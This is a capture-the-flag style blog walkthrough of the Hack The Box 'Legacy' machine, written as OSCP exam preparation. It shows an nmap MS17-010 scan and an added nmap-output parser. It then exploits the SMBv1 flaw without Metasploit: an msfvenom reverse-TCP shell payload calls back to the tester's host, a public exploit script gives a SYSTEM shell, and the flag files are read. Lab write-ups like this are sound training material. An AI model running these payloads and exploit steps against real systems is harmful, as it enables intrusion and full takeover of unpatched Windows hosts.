My PWK lab access has ended, but I haven’t stopped preparing for the upcoming OSCP examination. I’ve been practicing on the HTB labs to sharpen my skills, and working on writing buffer overflow exploits so that I’m more comfortable with the process. I hope to write more tutorials once I’ve finished my OSCP journey, but for now I’m focusing primarily on studying.
That doesn’t mean I’m going to leave you all high and dry, though. Nope! Today I’m posting my walkthrough of the HTB machine called “Legacy.”
Scans revealed ports 139 and 445 open, and a quick nmap script scan revealed that the host is vulnerable to a Remote Code Execution (RCE) vulnerability:
```
root@haxys:/htb# nmap -sT -p 139,445 -PN --script smb-vuln-ms17-010 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 14:12 EDT
Nmap scan report for 10.10.10.4
Host is up (0.067s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 0.84 seconds
```
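The nmap check above covers a single host. The Python script below is an added example, not part of the original walkthrough or of any tool it mentions: it parses the normal-format output of `nmap --script smb-vuln-ms17-010` for any number of hosts and lists the ones the script marked VULNERABLE, so a scan of a whole subnet can be triaged before reaching for an exploit. The sample output embedded in it is constructed to mirror the format shown above; the second host (10.10.10.5) and its error line are invented for illustration only.

```python
"""Triage helper for `nmap --script smb-vuln-ms17-010` normal-format output.

Added example, not from the original walkthrough. It walks nmap's text
output host by host, follows only the smb-vuln-ms17-010 script block, and
records the State: and IDs: lines the script prints for each host.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

SCRIPT_NAME = "smb-vuln-ms17-010"

# "Nmap scan report for 10.10.10.4" (or "for name (10.10.10.4)") starts a host.
HOST_RE = re.compile(r"^Nmap scan report for (.+?)\s*$")
# "| name:" opens a multi-line script block; "|_name:" is a one-line result.
# Nested lines inside a block have extra indentation and do not match.
SCRIPT_START_RE = re.compile(r"^\|[_ ]([\w-]+):")
STATE_RE = re.compile(r"^\|\s+State:\s*(.+?)\s*$")
IDS_RE = re.compile(r"^\|\s+IDs:\s*(.+?)\s*$")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


@dataclass
class HostResult:
    host: str
    state: str | None = None          # e.g. "VULNERABLE"; None if the script printed no state
    cves: list[str] = field(default_factory=list)

    @property
    def vulnerable(self) -> bool:
        return self.state == "VULNERABLE"


def parse_ms17_010(output: str) -> list[HostResult]:
    """Return one HostResult per 'Nmap scan report' section in the output."""
    results: list[HostResult] = []
    current: HostResult | None = None
    in_script = False                  # True while inside the ms17-010 block
    for line in output.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = HostResult(host=m.group(1))
            results.append(current)
            in_script = False
            continue
        if current is None:
            continue
        m = SCRIPT_START_RE.match(line)
        if m:
            # Enter the block only for our script; a "|_" start line is a
            # one-line result with nothing further to read.
            in_script = m.group(1) == SCRIPT_NAME and not line.startswith("|_")
            continue
        if not in_script:
            continue
        if not line.startswith("|"):   # left the script area entirely
            in_script = False
            continue
        m = STATE_RE.match(line)
        if m:
            current.state = m.group(1)
        m = IDS_RE.match(line)
        if m:
            current.cves.extend(CVE_RE.findall(m.group(1)))
        if line.startswith("|_"):      # last line of a multi-line block
            in_script = False
    return results


def vulnerable_hosts(output: str) -> list[str]:
    """Hosts whose ms17-010 block reported State: VULNERABLE."""
    return [r.host for r in parse_ms17_010(output) if r.vulnerable]


# Constructed sample: the first host mirrors the walkthrough's output, the
# second host and its error line are invented to show the non-vulnerable path.
SAMPLE_OUTPUT = """\
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 14:12 EDT
Nmap scan report for 10.10.10.4
Host is up (0.067s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

Nmap scan report for 10.10.10.5
Host is up (0.050s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
|_smb-vuln-ms17-010: ERROR: Script execution failed (use -d to debug)

Nmap done: 2 IP addresses (2 hosts up) scanned in 1.20 seconds
"""

if __name__ == "__main__":
    for r in parse_ms17_010(SAMPLE_OUTPUT):
        print(f"{r.host:16} state={r.state!s:16} cves={','.join(r.cves) or '-'}")
    print("vulnerable:", vulnerable_hosts(SAMPLE_OUTPUT))
```

Parsing nmap's human-readable output is inherently fragile; for anything more than a quick triage, run the scan with `-oX` and read the XML instead, which carries the same script output in a stable structure.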
I discovered a blog post that directed me to a script (from this GitHub repo) which exploits the MS17-010 vulnerability without relying on Metasploit. I downloaded the script and saved it as send_and_execute.py. I also downloaded a required library and saved it as mysmb.py, in the same directory.
The exploit works much like its name implies: it sends an executable file to the target, then tells the target to run the file as the System user. I would need to create a payload to send to the target. Using msfvenom, I crafted a reverse-TCP payload:
```
root@haxys:~/htb# msfvenom -p windows/shell_reverse_tcp -f exe -a x86 \
> --platform windows -o payload.exe LPORT=443 \
> LHOST=10.10.14.22 EXITFUNC=thread
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: payload.exe
```
With preparations complete, I started a netcat listener on port 443, then ran the exploit:
```
root@haxys:~/htb# python send_and_execute.py 10.10.10.4 payload.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x81e16da8
SESSION: 0xe1b25310
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe1bc3278
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe1bc3318
overwriting token UserAndGroups
Sending file XX2NUF.exe...
Opening SVCManager on 10.10.10.4.....
Creating service xFDj.....
Starting service xFDj.....
The NETBIOS connection with the remote host timed out.
Removing service xFDj.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done
```
In netcat, I had a shell. However, I couldn't confirm that I was logged in as SYSTEM:
```
root@haxys:~/htb# nc -vnlp 443
listening on [any] 443 ...
connect to [10.10.14.22] from (UNKNOWN) [10.10.10.4] 1030
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
whoami
'whoami' is not recognized as an internal or external command,
operable program or batch file.

C:\WINDOWS\system32>echo %username%
echo %username%
%username%
```
I used the send_and_execute.py script a second time, sending over the whoami.exe program found in the /usr/share/windows-binaries/ directory of Kali:
```
root@haxys:~/htb# python send_and_execute.py 10.10.10.4 /usr/share/windows-binaries/whoami.exe
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
<...>
Sending file CYVONX.exe...
<...>
Done
```
The file was uploaded as CYVONX.exe and stored in the root directory of C:\. The program informed me that I was running as SYSTEM:
```
C:\WINDOWS\system32>cd C:\
cd C:\

C:\>CYVONX.exe
CYVONX.exe
NT AUTHORITY\SYSTEM
```
From there, it was a simple matter to obtain the user and root flags:
```
C:\>cd "C:\Documents and Settings\john\Desktop"
cd "C:\Documents and Settings\john\Desktop"

C:\Documents and Settings\john\Desktop>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 10.10.10.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 10.10.10.2

C:\Documents and Settings\john\Desktop>type user.txt
type user.txt
e69af0e4f443de7e36876fda4ec7644f

C:\Documents and Settings\john\Desktop>cd ..\..\Administrator\Desktop
cd ..\..\Administrator\Desktop

C:\Documents and Settings\Administrator\Desktop>type root.txt
type root.txt
993442d258b0e0ec917cae9e695d5713
```
This is probably the easiest box on HTB.
MS17-010 is a well-known, widely-publicized vulnerability with weaponized exploits built into Kali. However, it seems that most people prefer to use Metasploit to exploit the vulnerability. Learning how to exploit the system without Metasploit was a handy and useful lesson. In fact, when I was first exploring this vulnerability, I found one system that nmap reported as vulnerable, but which Metasploit couldn't crack. By using the manual exploit, I was able to gain access to the machine and capture the flags.
This is why I always look for manual exploits. If you use Metasploit for everything, then all you're doing is learning how to use Metasploit. But if you seek out manual exploitation methods, you learn more about how the vulnerabilities and exploits work. That way, when Metasploit fails you, you're not totally lost.